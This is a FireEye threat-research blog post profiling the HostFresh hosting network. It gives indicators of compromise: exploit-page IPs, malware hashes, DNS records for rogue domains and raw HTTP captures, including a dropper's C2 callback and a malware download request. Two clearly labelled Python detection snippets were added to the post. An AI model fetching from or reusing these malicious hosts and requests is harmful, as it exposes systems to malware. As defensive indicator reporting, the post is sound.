
FireEye Malware

Intelligence Lab

Threat research, analysis, and mitigation


Bad Actors Part 4 - HostFresh

There was an excellent report published in 2008 by HostExploit that showed the connections between Atrivo and those for whom it provided downstream services. One such customer was a Chinese provider called HostFresh. I thought it might be interesting to look at two IP blocks which were previously part of the Atrivo network - 58.65.232.0/21 and 116.50.8.0/21 - but are now routed by others.

Below we can see the information registered about HostFresh:

aut-num: AS23898
as-name: HOSTFRESH-AS-AP
descr: HostFresh Internet
descr: Internet Service Provider
country: HK
notify: ipadmin@hostfresh.com

I encourage you to read the blog archive and review parts 1, 2, and 3 of this series to familiarize yourself with the format.

116.50.15.25 - When I browsed to a page on this IP, I was hit with a drive-by-download exploit which installed this piece of malware:

filename: S87ekhV.exe
md5sum: 7d70f143b67b8a0fdec403994b37fb4c
sha1sum: 65611bc74db1877e561379b09fefeb71d2f16544

Here is ThreatExpert's report on the payload.  I've seen this specific piece of malware attached to hundreds of different web exploits over the past few weeks.

58.65.232.25 - Similarly, on this other HostFresh IP I found another exploit page (don't type it in your browser):

GET /counter / ?462158045da0 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1
Referer: http://sineadhalpineventing.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Host: 58.65.232.25

58.65.235.9 - This is a callback for a generic dropper trojan that is not widely distributed:

GET /c2.php?a=xxxxxxx&b=384&c=302&d=1&e=0&f=0&g=404&h=90 HTTP/1.1
Host: 58.65.235.9
Cache-Control: no-cache
58.65.237.1 - Below you see malware hosted on this IP:

GET /4bm.exe HTTP/1.1
Referer: http://58.65.237.1/4bm.exe
Host: 58.65.237.1

VirusTotal report of the malware.

58.65.234.169 - all-nettinfo.com - Another exploit page is hosted here. Here is the malicious PDF of choice used on this server:
VirusTotal report

One interesting nugget I found about HostFresh was that it is home to a remarkably high (in terms of density) number of websites that cater to the underground warez scene. Many of the sites are forums for hosting direct links to tv/mp3s/pr0n/etc, some are for streaming bootleg movies, and others are tailored to a specific genre such as anime. The one thing these all have in common is that if they were hosted in the United States, surely there would be takedowns from the MPAA/RIAA issued to the hosting providers.

58.65.233.97 - moviefather.com - illegal movies
58.65.233.97 - xoxomovie.com - illegal movies
58.65.233.97 - davidmovie.com - illegal movies
58.65.234.164 - www.googleanalitics.net - exploits
58.65.234.164 - www.googleanalytlcs.com - exploits
58.65.234.165 - e.fissare.net - exploits. It also redirected me to gotruescan.com, mainscan6.com, and in6co.com, all rogue sites. This currently resolves to 127.0.0.1.
116.50.14.161 - ipb.quicksilverscreen.com - illegal movies
116.50.14.169 - anime6.org - shut down, illegal movies
116.50.14.201 - familyguynow.com - Family Guy streaming
116.50.14.209 - warez-bb.org - warez sharing
116.50.14.169 - movie6.net - illegal movies
116.50.15.89 - rapidlinks.co.uk - generic warez trading
116.50.15.97 - www.vid-stream.com - illegal movies
116.50.15.98 - www.futurama-stream.com - Futurama streaming
116.50.15.107 - www.da-anime.info - anime sharing
116.50.15.107 - www.da-forums.info - tv sharing
116.50.15.122 - sharedxs.com - warez sharing
116.50.15.125 - thephoenix-forums.com - warez sharing

Another way that HostFresh’s servers are being used to host “badness” is by hosting DNS services for other malicious domains. It only makes sense to host the actual malware site and its DNS server on different providers, since that adds another layer of resiliency to the malware network. Below you can see a malicious site that is using four different providers – HostFresh, UralNet (future blog posting alert!), Server-LU, and Netdirect-Net (also rates high on the “badness” scale).

st-athome.net - malware
;; ADDITIONAL SECTION:
ns1.st-athome.net.   3600  IN   A    91.211.64.71
ns4.st-athome.net.   3600  IN   A    212.117.162.90
ns3.st-athome.net.   3600  IN   A    89.149.226.121
ns2.st-athome.net.   3600  IN   A    116.50.15.1

Below you can see many of the DNS servers for malicious domains being hosted at HostFresh:

admediastats.com - redirects to rogues
ns2.admediastats.com.  3159  IN   A    116.50.15.1

adtrafficsolution.com - redirects to rogues
ns1.adtrafficsolution.com. 3158 IN   A    58.65.237.41

advertisenetworktour.cn - redirects to rogues
ns2.singatours.com.   172146 IN   A    58.65.237.81

antimalwareonlinescan.com - rogue
ns2.skycomputingonline.com. 172800 IN  A    115.126.5.10

internetbestsoftware.cn - stopbadware tagged
ns2.singatours.com.   171864 IN   A    58.65.237.81

kup9.com - stopbadware tagged
ns1.kup9.com.      171844 IN   A    58.65.234.81
ns2.kup9.com.      171844 IN   A    58.65.234.81

mssetup.net - rogue
ns2.dnstut.com.     171863 IN   A    58.65.233.33
ns3.dnstut.com.     171863 IN   A    58.65.233.34

of-ficialstat.com - hosting malware (credit: msmvps.com)
ns2.of-ficialstat.com. 2677  IN   A    116.50.15.1

privaetprotectedupdates.com - rogue
dns1.systempromns.com. 171640 IN   A    58.65.237.81

securityclick.net - rogue
ns2.securityclick.net. 2412  IN   A    116.50.15.1

st-aticglobalsources.com - rogue
ns2.st-aticglobalsources.com. 2413 IN  A    116.50.15.1

st-ation-appraisals.net - rogue
ns2.st-ation-appraisals.net. 2413 IN  A    116.50.15.1

undernation.com - warez sharing
ns1.hostworm.com.    172800 IN   A    116.50.15.57
ns2.hostworm.com.    172781 IN   A    116.50.15.57
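As an added example (not from the original post), the check below parses nameserver A records like those quoted above and flags or clusters domains whose nameservers sit inside the two HostFresh netblocks. The "# domain" label lines in the sample are constructed here to tie each record set to the domain it serves; the records themselves are the ones quoted in this post.

```python
import ipaddress
import re
from collections import defaultdict

# Netblocks the post attributes to HostFresh (formerly part of Atrivo).
HOSTFRESH = [ipaddress.ip_network(b) for b in ("58.65.232.0/21", "116.50.8.0/21")]

# Nameserver A records quoted in the post; the "# domain" lines are labels
# added here (constructed) to attach each record set to the domain it serves.
NS_RECORDS = """
# st-athome.net
ns1.st-athome.net.   3600  IN   A    91.211.64.71
ns4.st-athome.net.   3600  IN   A    212.117.162.90
ns3.st-athome.net.   3600  IN   A    89.149.226.121
ns2.st-athome.net.   3600  IN   A    116.50.15.1
# admediastats.com
ns2.admediastats.com.  3159  IN   A    116.50.15.1
# antimalwareonlinescan.com
ns2.skycomputingonline.com. 172800 IN  A    115.126.5.10
"""

A_RECORD = re.compile(r"^(\S+)\.\s+\d+\s+IN\s+A\s+(\d+(?:\.\d+){3})$")

def in_hostfresh(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in HOSTFRESH)

def parse_ns_records(text):
    """Return {domain: [(nameserver, ip), ...]} from the labelled dig output."""
    out, domain = defaultdict(list), None
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        if line.startswith("#"):
            domain = line[1:].strip()
        elif (m := A_RECORD.match(line)) and domain:
            out[domain].append((m.group(1), m.group(2)))
    return dict(out)

def flag_domains(records):
    """Domains whose nameservers touch the HostFresh blocks, with the IPs hit."""
    return {d: sorted({ip for _, ip in nss if in_hostfresh(ip)})
            for d, nss in records.items() if any(in_hostfresh(ip) for _, ip in nss)}

def cluster_by_ns_ip(records):
    """Pivot: which domains share a HostFresh nameserver IP."""
    groups = defaultdict(set)
    for d, nss in records.items():
        for _, ip in nss:
            if in_hostfresh(ip):
                groups[ip].add(d)
    return {ip: sorted(ds) for ip, ds in groups.items()}
```

Note that st-athome.net is flagged even though only one of its four nameservers is at HostFresh, which is exactly the multi-provider layout the post describes.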

These sites were being hijacked using a malicious DNS server on 58.65.237.41, although it does not at the time of writing appear to be responding.
cleaner2009solution.com - rogue
microsoft.securityinformationcenter.com - rogue

These domains I previously pointed out were being hosted at HostFresh:
proxima.ircgalaxy.pl - 58.65.234.89 - C&C
proxim.ircgalaxy.pl - 58.65.234.90 - C&C

The following domains I saw being hijacked (or properly hosted?) by a DNS server on 58.65.233.74. This DNS server is no longer responding, but I saw piles of DNS queries going to it over the past week.

The responsible DNSChanger trojan is this piece of malware

Here is the list of domains that clients were trying to resolve through that IP, *all of which are pornographic in nature*, and which have been used in banner ads and in spam. Not Safe For Work.

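An added example, not from the original post: the detection below takes flow-log lines (constructed here, in the form timestamp src:port -> dst:port proto) and reports internal hosts whose DNS queries go to the rogue resolvers named above (58.65.237.41 and 58.65.233.74), to anything else in the HostFresh blocks, or to any resolver other than an assumed approved one (10.0.0.2, an assumption). That is the traffic pattern a DNSChanger-style infection leaves on the wire.

```python
import ipaddress
import re
from collections import defaultdict

# Resolver IPs the post names as hijacking DNS for the domains it lists.
ROGUE_RESOLVERS = {"58.65.237.41", "58.65.233.74"}
# HostFresh netblocks from the post; any resolver inside them is suspect.
HOSTFRESH = [ipaddress.ip_network(b) for b in ("58.65.232.0/21", "116.50.8.0/21")]
# Resolvers clients on this network are supposed to use (assumed value).
APPROVED_RESOLVERS = {"10.0.0.2"}

# Constructed flow-log lines: timestamp src:port -> dst:port proto.
FLOW_LOG = """\
2009-03-10T12:00:01Z 10.0.0.5:51234 -> 10.0.0.2:53 UDP
2009-03-10T12:00:03Z 10.0.0.7:40011 -> 58.65.233.74:53 UDP
2009-03-10T12:00:04Z 10.0.0.7:40012 -> 58.65.233.74:53 UDP
2009-03-10T12:00:09Z 10.0.0.9:44000 -> 58.65.237.41:53 UDP
2009-03-10T12:00:10Z 10.0.0.9:44001 -> 116.50.15.1:53 UDP
2009-03-10T12:00:15Z 10.0.0.7:40013 -> 58.65.237.1:80 TCP
"""

FLOW = re.compile(r"^(\S+) (\S+):(\d+) -> (\S+):(\d+) (UDP|TCP)$")

def classify_resolver(ip):
    """Why a DNS destination is interesting, or None if it is an approved one."""
    if ip in APPROVED_RESOLVERS:
        return None
    if ip in ROGUE_RESOLVERS:
        return "known rogue resolver"
    if any(ipaddress.ip_address(ip) in net for net in HOSTFRESH):
        return "resolver inside HostFresh block"
    return "unapproved resolver"

def find_dns_changer_victims(log):
    """Map internal hosts to the suspect resolvers they sent DNS queries to."""
    victims = defaultdict(dict)
    for line in log.splitlines():
        m = FLOW.match(line.strip())
        if not m or m.group(5) != "53":
            continue  # not a DNS query at all (e.g. the port-80 download)
        src, dst = m.group(2), m.group(4)
        reason = classify_resolver(dst)
        if reason:
            victims[src][dst] = reason
    return dict(victims)
```

Hosts that only talk to the approved resolver never appear in the result, so the output is a short list of machines worth pulling for the DNSChanger sample.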

In conclusion, HostFresh does not seem to be the source of as much badness as it was in the Atrivo days, but it’s far from what I would consider a clean network.

Alex Lanstein @ FireEye Malware Intelligence Lab
Questions/Comments to research [@] fireeye [.] com
